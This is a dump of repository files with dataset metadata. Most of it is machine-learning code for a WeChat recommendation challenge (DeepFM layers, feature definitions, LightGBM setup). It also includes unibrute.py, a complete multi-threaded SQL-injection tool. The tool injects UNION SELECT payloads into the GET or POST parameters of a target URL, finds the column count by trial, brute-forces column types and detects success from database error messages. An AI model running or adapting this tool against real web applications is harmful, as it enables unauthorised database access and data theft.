----------------------------------\ndef get_varlen_pooling_list(embedding_dict, features, feature_index, varlen_sparse_feature_columns, device):\n varlen_sparse_embedding_list = []\n\n for feat in varlen_sparse_feature_columns:\n seq_emb = embedding_dict[feat.embedding_name](\n features[:, feature_index[feat.name][0]:feature_index[feat.name][1]].long())\n if feat.length_name is None:\n seq_mask = features[:, feature_index[feat.name][0]:feature_index[feat.name][1]].long() != 0\n\n emb = SequencePoolingLayer(mode=feat.combiner, supports_masking=True, device=device)(\n [seq_emb, seq_mask])\n else:\n seq_length = features[:, feature_index[feat.length_name][0]:feature_index[feat.length_name][1]].long()\n emb = SequencePoolingLayer(mode=feat.combiner, supports_masking=False, device=device)(\n [seq_emb, seq_length])\n varlen_sparse_embedding_list.append(emb)\n return varlen_sparse_embedding_list\n\n\n# -------------------------------\ndef combined_dnn_input(sparse_embedding_list, dense_value_list):\n if len(sparse_embedding_list) > 0 and len(dense_value_list) > 0:\n sparse_dnn_input = torch.flatten(\n torch.cat(sparse_embedding_list, dim=-1), start_dim=1)\n dense_dnn_input = torch.flatten(\n torch.cat(dense_value_list, dim=-1), start_dim=1)\n return concat_fun([sparse_dnn_input, dense_dnn_input])\n elif len(sparse_embedding_list) > 0:\n return torch.flatten(torch.cat(sparse_embedding_list, dim=-1), start_dim=1)\n elif len(dense_value_list) > 0:\n return torch.flatten(torch.cat(dense_value_list, dim=-1), start_dim=1)\n else:\n raise NotImplementedError\n\n\ndef concat_fun(inputs, axis=-1):\n if len(inputs) == 1:\n return inputs[0]\n else:\n return torch.cat(inputs, dim=axis)\n\n\ndef slice_arrays(arrays, start=None, stop=None):\n \"\"\"Slice an array or list of arrays.\n\n This takes an array-like, or a list of\n array-likes, and outputs:\n - arrays[start:stop] if `arrays` is an array-like\n - [x[start:stop] for x in arrays] if `arrays` is a list\n\n Can also work on list/array of indices: `slice_arrays(x, indices)`\n\n Arguments:\n arrays: Single array or list of arrays.\n start: can be an integer index (start index)\n or a list/array of indices\n stop: integer (stop index); should be None if\n `start` was a list.\n\n Returns:\n A slice of the array(s).\n\n Raises:\n ValueError: If the value of start is a list and stop is not None.\n \"\"\"\n\n if arrays is None:\n return [None]\n\n if isinstance(arrays, np.ndarray):\n arrays = [arrays]\n\n if isinstance(start, list) and stop is not None:\n raise ValueError('The stop argument has to be None if the value of start '\n 'is a list.')\n elif isinstance(arrays, list):\n if hasattr(start, '__len__'):\n # hdf5 datasets only support list objects as indices\n if hasattr(start, 'shape'):\n start = start.tolist()\n return [None if x is None else x[start] for x in arrays]\n else:\n if len(arrays) == 1:\n return arrays[0][start:stop]\n return [None if x is None else x[start:stop] for x in arrays]\n else:\n if hasattr(start, '__len__'):\n if hasattr(start, 'shape'):\n start = start.tolist()\n return arrays[start]\n elif hasattr(start, '__getitem__'):\n return arrays[start:stop]\n else:\n return [None]\n"
},
{
"alpha_fraction": 0.4354838728904724,
"alphanum_fraction": 0.6612903475761414,
"avg_line_length": 14.5,
"blob_id": "67d84bd843aff00a44b19b092a4746cfb96cb71a",
"content_id": "7e6d2ab015fecb35d5694749e4dd21aa623b8b05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "pyyaml==5.4.1\ntqdm==4.59.0\npytz==2021.1\nscikit-learn==0.24.2\nmatplotlib==3.4.2\npandas==1.2.4\nlightgbm==3.2.1\n# torch==1.8.0\n"
},
{
"alpha_fraction": 0.5810526609420776,
"alphanum_fraction": 0.5810526609420776,
"avg_line_length": 26.941177368164062,
"blob_id": "37cb66ebf35e1c78d11146f35f42792ce3b73a93",
"content_id": "e73b05f7e92d9c1e9d24baa4ef2fe3ae4d3d1a99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 17,
"path": "/src/core/entrypoint.py",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "from core.tasks.deepfm import DeepFM_Manager\nfrom core.tasks.lgb import LightGBM_Manager\n\n\nclass EntryPoint(object):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def start(self):\n if self.cfg.task == 'DeepFM':\n task = DeepFM_Manager(self.cfg)\n task.start()\n elif self.cfg.task == 'LightGBM':\n task = LightGBM_Manager(self.cfg)\n task.start()\n else:\n raise ValueError(\"unknown task name\")\n"
},
{
"alpha_fraction": 0.5823211669921875,
"alphanum_fraction": 0.5829959511756897,
"avg_line_length": 33.46511459350586,
"blob_id": "64c827c1eff0ba1601afc4ca00d85d04de76439a",
"content_id": "c00777273876baaa1c3d5b77d1d5e82e567c97ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1482,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 43,
"path": "/src/core/tasks/lgb.py",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "\"\"\"\nLightGBM\n\"\"\"\nimport lightgbm as lgb\nimport pandas\nfrom utils import DecoratorTimer\n\n\nclass LightGBM_Manager(object):\n model_name = 'LightGBM'\n\n def __init__(self, cfg):\n self.cfg = cfg\n self.yml_cfg = self.cfg.yml_cfg\n self.model_cfg = self.yml_cfg[self.model_name]\n assert self.cfg.dataset_name == 'wechat1'\n\n @DecoratorTimer()\n def handle_dataset(self):\n # config\n data_folder_path = self.cfg.data_folder_path\n # columns\n common_columns = ['userid', 'feedid']\n pred_columns = ['read_comment', 'like', 'click_avatar', 'forward']\n action_columns = ['play', 'stay', 'device', 'date_', 'follow', 'favorite', 'comment']\n feed_columns = [\n 'authorid', 'videoplayseconds', 'description', 'ocr', 'asr', 'description_char', 'ocr_char',\n 'asr_char', 'bgm_song_id', 'bgm_singer_id', 'manual_keyword_list', 'machine_keyword_list',\n 'manual_tag_list', 'machine_tag_list', 'feed_embedding'\n ]\n # feat types\n sparse_feat_names = common_columns + \\\n ['follow', 'favorite', 'comment', 'authorid', 'bgm_song_id', 'bgm_singer_id']\n dense_feat_names = ['videoplayseconds', 'play', 'stay']\n\n # handle\n raw_feed_info = pandas.read_csv(data_folder_path + \"/feed_info.csv\")\n raw_user_action = pandas.read_csv(data_folder_path + \"/user_action.csv\")\n\n\n\n def start(self):\n self.handle_dataset()\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6857143044471741,
"avg_line_length": 10.333333015441895,
"blob_id": "dc3d07e8a5e05dcfef11788449f7636faf65186a",
"content_id": "267512ea6d8b49457a57276071bd6a553756554d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 3,
"path": "/README.md",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "# 微信2021大数据挑战赛\n\nto be continue...\n\n"
},
{
"alpha_fraction": 0.5747442245483398,
"alphanum_fraction": 0.5856001973152161,
"avg_line_length": 34.14912414550781,
"blob_id": "48b47ad75540b9fb3195257439be3f8f07a8018e",
"content_id": "1034cd772ccf71b25a8d7364c60fec81b63f43b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8014,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 228,
"path": "/src/deepctr_ext/layers.py",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "import torch.nn as nn\nimport torch\n\nclass FM(nn.Module):\n \"\"\"Factorization Machine models pairwise (order-2) feature interactions\n without linear term and bias.\n Input shape\n - 3D tensor with shape: ``(batch_size,field_size,embedding_size)``.\n Output shape\n - 2D tensor with shape: ``(batch_size, 1)``.\n References\n - [Factorization Machines](https://www.csie.ntu.edu.tw/~b97053/paper/Rendle2010FM.pdf)\n \"\"\"\n\n def __init__(self):\n super(FM, self).__init__()\n\n def forward(self, inputs):\n fm_input = inputs\n\n square_of_sum = torch.pow(torch.sum(fm_input, dim=1, keepdim=True), 2)\n sum_of_square = torch.sum(fm_input * fm_input, dim=1, keepdim=True)\n cross_term = square_of_sum - sum_of_square\n cross_term = 0.5 * torch.sum(cross_term, dim=2, keepdim=False)\n\n return cross_term\n\nclass Identity(nn.Module):\n def __init__(self, **kwargs):\n super(Identity, self).__init__()\n\n def forward(self, X):\n return X\n\n\ndef activation_layer(act_name, hidden_size=None, dice_dim=2):\n \"\"\"Construct activation layers\n\n Args:\n act_name: str or nn.Module, name of activation function\n hidden_size: int, used for Dice activation\n dice_dim: int, used for Dice activation\n Return:\n act_layer: activation layer\n \"\"\"\n act_layer = None\n if isinstance(act_name, str):\n if act_name.lower() == 'sigmoid':\n act_layer = nn.Sigmoid()\n elif act_name.lower() == 'linear':\n act_layer = Identity()\n elif act_name.lower() == 'relu':\n act_layer = nn.ReLU(inplace=True)\n elif act_name.lower() == 'prelu':\n act_layer = nn.PReLU()\n elif issubclass(act_name, nn.Module):\n act_layer = act_name()\n else:\n raise NotImplementedError\n\n return act_layer\n\n\nclass DNN(nn.Module):\n \"\"\"The Multi Layer Percetron\n\n Input shape\n - nD tensor with shape: ``(batch_size, ..., input_dim)``. The most common situation would be a 2D input with shape ``(batch_size, input_dim)``.\n\n Output shape\n - nD tensor with shape: ``(batch_size, ..., hidden_size[-1])``. For instance, for a 2D input with shape ``(batch_size, input_dim)``, the output would have shape ``(batch_size, hidden_size[-1])``.\n\n Arguments\n - **inputs_dim**: input feature dimension.\n\n - **hidden_units**:list of positive integer, the layer number and units in each layer.\n\n - **activation**: Activation function to use.\n\n - **l2_reg**: float between 0 and 1. L2 regularizer strength applied to the kernel weights matrix.\n\n - **dropout_rate**: float in [0,1). Fraction of the units to dropout.\n\n - **use_bn**: bool. Whether use BatchNormalization before activation or not.\n\n - **seed**: A Python integer to use as random seed.\n \"\"\"\n\n def __init__(self, inputs_dim, hidden_units, activation='relu', l2_reg=0, dropout_rate=0, use_bn=False,\n init_std=0.0001, dice_dim=3, seed=1024, device='cpu'):\n super(DNN, self).__init__()\n self.dropout_rate = dropout_rate\n self.dropout = nn.Dropout(dropout_rate)\n self.seed = seed\n self.l2_reg = l2_reg\n self.use_bn = use_bn\n if len(hidden_units) == 0:\n raise ValueError(\"hidden_units is empty!!\")\n hidden_units = [inputs_dim] + list(hidden_units)\n\n self.linears = nn.ModuleList(\n [nn.Linear(hidden_units[i], hidden_units[i + 1]) for i in range(len(hidden_units) - 1)])\n\n if self.use_bn:\n self.bn = nn.ModuleList(\n [nn.BatchNorm1d(hidden_units[i + 1]) for i in range(len(hidden_units) - 1)])\n\n self.activation_layers = nn.ModuleList(\n [activation_layer(activation, hidden_units[i + 1], dice_dim) for i in range(len(hidden_units) - 1)])\n\n for name, tensor in self.linears.named_parameters():\n if 'weight' in name:\n nn.init.normal_(tensor, mean=0, std=init_std)\n\n self.to(device)\n\n def forward(self, inputs):\n deep_input = inputs\n\n for i in range(len(self.linears)):\n\n fc = self.linears[i](deep_input)\n\n if self.use_bn:\n fc = self.bn[i](fc)\n\n fc = self.activation_layers[i](fc)\n\n fc = self.dropout(fc)\n deep_input = fc\n return deep_input\n\n\nclass PredictionLayer(nn.Module):\n \"\"\"\n Arguments\n - **task**: str, ``\"binary\"`` for binary logloss or ``\"regression\"`` for regression loss\n - **use_bias**: bool.Whether add bias term or not.\n \"\"\"\n\n def __init__(self, task='binary', use_bias=True, **kwargs):\n if task not in [\"binary\", \"multiclass\", \"regression\"]:\n raise ValueError(\"task must be binary,multiclass or regression\")\n\n super(PredictionLayer, self).__init__()\n self.use_bias = use_bias\n self.task = task\n if self.use_bias:\n self.bias = nn.Parameter(torch.zeros((1,)))\n\n def forward(self, X):\n output = X\n if self.use_bias:\n output += self.bias\n if self.task == \"binary\":\n output = torch.sigmoid(output)\n return output\n\n\nclass SequencePoolingLayer(nn.Module):\n \"\"\"The SequencePoolingLayer is used to apply pooling operation(sum,mean,max) on variable-length sequence feature/multi-value feature.\n\n Input shape\n - A list of two tensor [seq_value,seq_len]\n\n - seq_value is a 3D tensor with shape: ``(batch_size, T, embedding_size)``\n\n - seq_len is a 2D tensor with shape : ``(batch_size, 1)``,indicate valid length of each sequence.\n\n Output shape\n - 3D tensor with shape: ``(batch_size, 1, embedding_size)``.\n\n Arguments\n - **mode**:str.Pooling operation to be used,can be sum,mean or max.\n\n \"\"\"\n\n def __init__(self, mode='mean', supports_masking=False, device='cpu'):\n\n super(SequencePoolingLayer, self).__init__()\n if mode not in ['sum', 'mean', 'max']:\n raise ValueError('parameter mode should in [sum, mean, max]')\n self.supports_masking = supports_masking\n self.mode = mode\n self.device = device\n self.eps = torch.FloatTensor([1e-8]).to(device)\n self.to(device)\n\n def _sequence_mask(self, lengths, maxlen=None, dtype=torch.bool):\n # Returns a mask tensor representing the first N positions of each cell.\n if maxlen is None:\n maxlen = lengths.max()\n row_vector = torch.arange(0, maxlen, 1).to(lengths.device)\n matrix = torch.unsqueeze(lengths, dim=-1)\n mask = row_vector < matrix\n\n mask.type(dtype)\n return mask\n\n def forward(self, seq_value_len_list):\n if self.supports_masking:\n uiseq_embed_list, mask = seq_value_len_list # [B, T, E], [B, 1]\n mask = mask.float()\n user_behavior_length = torch.sum(mask, dim=-1, keepdim=True)\n mask = mask.unsqueeze(2)\n else:\n uiseq_embed_list, user_behavior_length = seq_value_len_list # [B, T, E], [B, 1]\n mask = self._sequence_mask(user_behavior_length, maxlen=uiseq_embed_list.shape[1],\n dtype=torch.float32) # [B, 1, maxlen]\n mask = torch.transpose(mask, 1, 2) # [B, maxlen, 1]\n\n embedding_size = uiseq_embed_list.shape[-1]\n\n mask = torch.repeat_interleave(mask, embedding_size, dim=2) # [B, maxlen, E]\n\n if self.mode == 'max':\n hist = uiseq_embed_list - (1 - mask) * 1e9\n hist = torch.max(hist, dim=1, keepdim=True)[0]\n return hist\n hist = uiseq_embed_list * mask.float()\n hist = torch.sum(hist, dim=1, keepdim=False)\n\n if self.mode == 'mean':\n self.eps = self.eps.to(user_behavior_length.device)\n hist = torch.div(hist, user_behavior_length.type(torch.float32) + self.eps)\n\n hist = torch.unsqueeze(hist, dim=1)\n return hist\n"
},
{
"alpha_fraction": 0.6562588810920715,
"alphanum_fraction": 0.6590973734855652,
"avg_line_length": 36.478721618652344,
"blob_id": "40c87f15782ae31bd7d10c095324cff0a0bb4c60",
"content_id": "e7cfc8d1232a6d0c6d8ac15b0d11264fd3a5d080",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3523,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 94,
"path": "/src/main.py",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "from utils import UnionConfig, LoggerUtil, DecoratorTimer, PathUtil, add_argument_from_dict_format\nfrom conf import settings\nfrom core.entrypoint import EntryPoint\nimport os\nimport argparse\nimport logging\nimport shutil\nimport traceback\nimport copy\nimport sys\n\n\nregistered_task_list = ['DeepFM', 'LightGBM']\n\n\ndef get_config_object_and_parse_args():\n # first time resolve sys.argv\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset_name', type=str, default='wechat1', help='dataset name')\n parser.add_argument('--task', type=str, default='LightGBM',\n choices=registered_task_list,\n help='task_name: {}'.format(registered_task_list))\n args, unknown_args = parser.parse_known_args()\n\n config = UnionConfig.from_py_module(settings) # get config from settings.py\n config.merge_asdict(args.__dict__) # merge config from argparse\n yml_cfg = UnionConfig.from_yml_file(\n config.CONFIG_FOLDER_PATH + \"/datasets/{}.yml\".format(args.dataset_name)\n ) # get config from {dataset_name}.yml\n\n # filter irrelevant config\n tasks = copy.copy(registered_task_list)\n tasks.remove(config.task)\n [yml_cfg.__delitem__(task) for task in tasks if task in yml_cfg.keys()]\n config.yml_cfg = yml_cfg\n\n # second time resolve sys.argv\n model_cfg = yml_cfg[config.task]\n parser2 = add_argument_from_dict_format(model_cfg, filter_keys=list(args.__dict__.keys()))\n args2 = parser2.parse_args(unknown_args)\n for key in model_cfg.keys():\n if key in args2.__dict__:\n model_cfg[key] = args2.__dict__[key]\n\n return config\n\n\ndef init_all(cfg: UnionConfig):\n cfg.data_folder_path = cfg.DATA_FOLDER_PATH + \"/{}\".format(cfg.dataset_name)\n cfg.TMPOUT_FOLDER_PATH += \"/{}\".format(cfg.dataset_name)\n cfg.OUTPUT_FOLDER_PATH += \"/{}\".format(cfg.dataset_name)\n cfg.TMPOUT_FOLDER_PATH = os.path.realpath(cfg.TMPOUT_FOLDER_PATH)\n cfg.OUTPUT_FOLDER_PATH = os.path.realpath(cfg.OUTPUT_FOLDER_PATH)\n PathUtil.check_path_exist(cfg.data_folder_path)\n\n if cfg.task in registered_task_list:\n cfg.tmpout_folder_path = cfg.TMPOUT_FOLDER_PATH + \"/{}/{}\".format(cfg.task, cfg.ID)\n cfg.output_folder_path = cfg.OUTPUT_FOLDER_PATH + \"/{}\".format(cfg.task)\n PathUtil.auto_create_folder_path(\n cfg.tmpout_folder_path,\n cfg.output_folder_path\n )\n else:\n raise ValueError(\"unknown task name\")\n\n log_filepath = cfg.tmpout_folder_path + \"/{ID}.log\".format(ID=cfg.ID)\n cfg.logger = LoggerUtil(logfile=log_filepath, disableFile=False).get_logger()\n DecoratorTimer.logger = cfg.logger\n\n\ndef main(config):\n config.logger.info(\"====\" * 15)\n config.logger.info(\"[ID]: \" + config.ID)\n config.logger.info(\"[DATASET]: \" + config.dataset_name)\n config.logger.info(\"[TASK]: \" + config.task)\n config.logger.info(\"[ARGV]: {}\".format(sys.argv))\n config.logger.info(\"[ALL_CFG]: \\n\" + config.dump_fmt())\n config.dump_file(config.tmpout_folder_path + \"/\" + \"config.json\")\n config.logger.info(\"====\" * 15)\n entrypoint = EntryPoint(config)\n entrypoint.start()\n config.logger.info(\"Task Completed!\")\n\n\nif __name__ == '__main__':\n config = get_config_object_and_parse_args()\n init_all(config) # init config\n try:\n main(config)\n logging.shutdown()\n shutil.move(config.tmpout_folder_path, config.output_folder_path)\n except Exception as e:\n config.logger.error(traceback.format_exc())\n raise e\n"
},
{
"alpha_fraction": 0.5905172228813171,
"alphanum_fraction": 0.5953065156936646,
"avg_line_length": 31.123077392578125,
"blob_id": "c489195d7883013e219a99bd53bcf630a0551c52",
"content_id": "ac2adce61f2043c739805293ac6c853ba7c5ee5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2088,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 65,
"path": "/src/deepctr_ext/feat.py",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\n\n\nclass SparseFeat(namedtuple('SparseFeat',\n ['name', 'vocabulary_size', 'embedding_dim', 'use_hash', 'dtype', 'embedding_name'])):\n __slots__ = ()\n\n def __new__(cls, name, vocabulary_size, embedding_dim=4, use_hash=False, dtype=\"int32\", embedding_name=None):\n if embedding_name is None:\n embedding_name = name\n if embedding_dim == \"auto\":\n embedding_dim = 6 * int(pow(vocabulary_size, 0.25))\n if use_hash:\n print(\n \"Notice! Feature Hashing on the fly currently is not supported in torch version,you can use tensorflow version!\")\n return super(SparseFeat, cls).__new__(cls, name, vocabulary_size, embedding_dim, use_hash, dtype,\n embedding_name)\n\n def __hash__(self):\n return self.name.__hash__()\n\n\nclass VarLenSparseFeat(namedtuple('VarLenSparseFeat',\n ['sparsefeat', 'maxlen', 'combiner', 'length_name'])):\n __slots__ = ()\n\n def __new__(cls, sparsefeat, maxlen, combiner=\"mean\", length_name=None):\n return super(VarLenSparseFeat, cls).__new__(cls, sparsefeat, maxlen, combiner, length_name)\n\n @property\n def name(self):\n return self.sparsefeat.name\n\n @property\n def vocabulary_size(self):\n return self.sparsefeat.vocabulary_size\n\n @property\n def embedding_dim(self):\n return self.sparsefeat.embedding_dim\n\n @property\n def dtype(self):\n return self.sparsefeat.dtype\n\n @property\n def embedding_name(self):\n return self.sparsefeat.embedding_name\n\n @property\n def group_name(self):\n return self.sparsefeat.group_name\n\n def __hash__(self):\n return self.name.__hash__()\n\n\nclass DenseFeat(namedtuple('DenseFeat', ['name', 'dimension', 'dtype'])):\n __slots__ = ()\n\n def __new__(cls, name, dimension=1, dtype=\"float32\"):\n return super(DenseFeat, cls).__new__(cls, name, dimension, dtype)\n\n def __hash__(self):\n return self.name.__hash__()\n"
}
] | 8 |
Trietptm-on-Security/Unibrute | https://github.com/Trietptm-on-Security/Unibrute | 970aa0fb470f8f8c65cb8d40f33207fa7f50f5fc | b3fb4b72582f67f849336038d05b058a639b02b6 | 074e18c43ebc314b68f4147dde7d21d457fbc23d | refs/heads/master | 2017-05-30T13:22:06.281257 | 2011-09-09T10:08:40 | 2011-09-09T10:08:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5538997650146484,
"alphanum_fraction": 0.5613508224487305,
"avg_line_length": 29.59191131591797,
"blob_id": "fbb44e5c7e1c56baefc1c1b8c107e5319cb6d4cb",
"content_id": "abce17beac726724810e5f14034542dd6898fe50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8321,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 272,
"path": "/unibrute.py",
"repo_name": "Trietptm-on-Security/Unibrute",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n''':'\nexec python -u \"$0\" ${1+\"$@\"}\n' '''\n\n# Unibrute - multi threaded union bruteforcer\n# By Justin Clarke, justin at justinclarke.com\n# Version .01b2, December 11, 2003\n#\n# This tool is released under the Reciprocal Public License\n# This open source license is available for review at\n# http://www.opensource.org/licenses/rpl.php\n#\n\nimport threading, Queue, sys, getopt, string, urllib, urllib2, time, re\n\n#\n# class to manage the threading. No actual stuff is done in here - we pass function names and args\n# taken from Python in a Nutshell.... great book\n#\nclass Worker(threading.Thread): # inherits the Thread class\n requestID = 0 # each thread has a request ID so we can match responses\n\n # constructor - takes two queues as parameters (overrides threading constructor)\n def __init__(self, requestsQueue, resultsQueue, **kwds):\n threading.Thread.__init__(self, **kwds)\n self.setDaemon(1) # run in background\n self.workRequestQueue = requestsQueue\n self.resultQueue = resultsQueue\n self.start() # start the thread\n\n # call the function here - pass in the function and parameters\n def performWork(self, callable, *args, **kwds):\n Worker.requestID += 1\n self.workRequestQueue.put((Worker.requestID, callable, args, kwds))\n return Worker.requestID\n \n def run(self): # override run\n while 1:\n requestID, callable, args, kwds = self.workRequestQueue.get()\n self.resultQueue.put((requestID, callable(*args, **kwds)))\n\n#\n# main\n#\n\ndef usage():\n print \"\"\"\n ._____. __ \n __ __ ____ |__\\_ |_________ __ ___/ |_ ____ \n| | \\/ \\| || __ \\_ __ \\ | \\ __\\/ __ \\ \n| | / | \\ || \\_\\ \\ | \\/ | /| | \\ ___/ \n|____/|___| /__||___ /__| |____/ |__| \\___ >\n \\/ \\/ \\/ \n\nUsage: %s [options] url\n\n [-h] - this help\n [-v] - verbose mode\n [-t number] - number of worker threads (default 20)\n [-c string] - cookies needed\n [-m GET|POST] - force exploit on the querystring/post data\n [-d string] - POST data \n [-n number] - number of columns in UNION\n [-g string] - generic error string - specify columns if using this\"\"\" % sys.argv[0]\n\n print '\\ne.g. %s -d \"type=searchstate&state=az\" http://foo.bar/locator.asp' % sys.argv[0]\n sys.exit(1)\n\n# User variables - change if you want\nnum = 20 # default number of worker threads\ntargeturl = \"\"\ncookie = \"\"\nverb = \"\"\nverbose = False\npostdata = \"\"\ncolnum = 0\ntypes = {\"char\":\"to_char(1)\", \"number\":\"to_number(1)\",\"date\":\"to_date(1)\"}\nerrors = \"(OLE DB|SQL Server|Incorrect Syntax|ODBC Driver|ORA\\-|SQL command not|Oracle Error Code|CFQUERY|Operand clash|MySQL|CLI Driver|JET Database Engine error)\"\ncolnoerr = \"incorrect number of result columns\"\nexploit = \"' union all select \"\ntrailer = \" from ALL_TABLES--\"\ngeneric = \"\"\nregex = \"\"\ncoltest = \"null\" # what we're testing for columns with\ncollim = 100\n\nprintf = sys.stdout.write # so we can avoid those irritating space after a print\n\nerrormatch = '|'.join(map(re.escape,errors))\n\ntry:\n opts, args = getopt.gnu_getopt(sys.argv[1:], \"g:hc:m:t:vd:n:\")\n if len(args) <> 1: # 1 arg is the URL\n raise getopt.error\nexcept:\n usage()\n\ntargeturl = args\n\nfor o,a in opts:\n if o == \"-v\":\n verbose = True\n if o == \"-c\":\n cookie = a\n if o == \"-h\":\n usage()\n if o == \"-d\":\n postdata = a\n verb = \"POST\"\n if o == \"-n\":\n colnum = int(a)\n if colnum < 1:\n print \"Must have at least 1 worker thread\"\n sys.exit(1)\n if o == \"-m\":\n if string.upper(a) == \"POST\":\n verb = \"POST\"\n else:\n if string.upper(a) == \"GET\":\n verb = \"GET\"\n else:\n print \"Method must be GET or POST\"\n sys.exit(1)\n if o == \"-t\":\n num = int(a)\n if num < 1:\n print \"Columns must be at least 1\"\n sys.exit(1)\n if o == \"-g\":\n generic = a\n\nif not verb:\n verb = \"GET\"\n\nif (verb == \"POST\" and not postdata):\n print \"Specify some POST data\"\n sys.exit(1)\n \nif (generic and not colnum): # can't do autodiscovery with generic errors\n print \"Specify number of columns\"\n sys.exit(1)\n\nif generic:\n regex = generic\nelse:\n regex = errors\n\nrequestsQueue = Queue.Queue()\nresultsQueue = Queue.Queue()\ncolumnsQueue = Queue.Queue()\n\nfor i in range(num):\n worker = Worker(requestsQueue, resultsQueue)\n\ndef doRequest(expressionString, exploitdata):\n while True:\n if verb == \"GET\": \n req = urllib2.Request(expressionString)\n else:\n req = urllib2.Request(expressionString, exploitdata) \n if cookie<>\"\":\n req.add_header(\"Cookies\",cookie)\n try:\n resp = urllib2.urlopen(req)\n except urllib2.HTTPError,err: # catch an HTTP 500 error or similar here\n return err.read()\n except: # can't reach the app or something\n print \"Unexpected error on: %s %s - Retrying in 5 seconds\" % (expressionString,exploitdata)\n time.sleep(5)\n else:\n return resp.read()\n\ndef showResults():\n while True:\n try: id, results = resultsQueue.get_nowait()\n except Queue.Empty: return\n\n if verbose:\n print 'Result %d: %s -> %s' % (id, workRequests[id], results)\n\n if re.search(regex,results):\n del workRequests[id]\n printf(\".\")\n else: # no error!\n if not results: return # no response\n \n print \"\\nMatch found! Request no %d -> %s\" % (id,workRequests[id])\n del workRequests[id]\n print \"Time elapsed: %d seconds\" % (time.time() - starttime)\n sys.exit(0)\n\nworkRequests = {}\n\ndef gencases(depth, seq):\n if depth >= colnum: # we've recursed to colnum columns\n combo = ','.join(seq)\n columnsQueue.put(combo)\n else: # if not recurse off for each data type value\n for i in types.values():\n gencases(depth+1,seq+[i])\n\ndef genreqs(cols):\n if verb == \"GET\": # standard GET request- exploit querystring\n expressionString = targeturl[0] + urllib.quote(exploit + cols + trailer)\n exploitdata=\"\"\n elif (verb == \"GET\" and postdata): # post request, but exploit querystring\n expressionString = targeturl[0] + urllib.quote(exploit + cols + trailer)\n exploitdata = postdata \n else: \n expressionString = targeturl[0] # standard post request, exploit post data\n exploitdata = postdata + urllib.quote(exploit + cols + trailer)\n \n id = worker.performWork(doRequest, expressionString, exploitdata)\n if verb == \"GET\":\n workRequests[id] = expressionString\n else:\n workRequests[id] = exploitdata\n \ndef getcols(depth):\n if depth >= collim: # we've hit the column limit?\n print \"Error determining number of columns\"\n sys.exit(1)\n else: # if not check and recurse for the next one\n test = \"\"\n for i in range(depth):\n if i < depth-1:\n test += coltest\n test += \",\"\n else:\n test += coltest\n\n genreqs(test)\n \n id, results = resultsQueue.get()\n \n if verbose:\n print 'Result: %s' % results\n\n del workRequests[id]\n \n if re.search(colnoerr,results):\n printf(\".\")\n else: # no column error!\n if not results: return # no response\n print \"\\nFound columns: %d\" % depth\n return depth\n \n ret = getcols(depth+1)\n return ret\n \n\nif not colnum:\n colnum = getcols(1) # discover columns\n\nprint \"Generating test cases\"\ngencases(0,[])\nprint \"Starting testing\"\n\nstarttime = time.time()\n\nfor i in range(columnsQueue.qsize()):\n genreqs(columnsQueue.get_nowait())\n if not resultsQueue.empty(): \n showResults()\n\nwhile True: \n if not resultsQueue.empty(): \n showResults()\n if not workRequests: \n print \"Hmm, didn't find a match? Try -v to see whats going on\"\n sys.exit(1)\n"
}
] | 1 |
JiTao3/hierarchical_attention | https://github.com/JiTao3/hierarchical_attention | 06f67f24fb25c5ee376cb281da3b2f7f69e65b90 | 113246ecbf5a88a1764f7b994a510adead2d7afd | 229e0c00b847aa63064a275da46d6b3a91a45fa6 | refs/heads/master | 2022-12-16T21:37:35.146753 | 2020-09-19T09:50:38 | 2020-09-19T09:50:38 | 294,323,015 | 3 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.586705207824707,
"alphanum_fraction": 0.6127167344093323,
"avg_line_length": 30.454545974731445,
"blob_id": "e3ec9af64f879c45273e0fa51822a3deea51721a",
"content_id": "cf94acf1018ba121657e2e2811da0f604efb3383",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 692,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 22,
"path": "/util/qerror.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
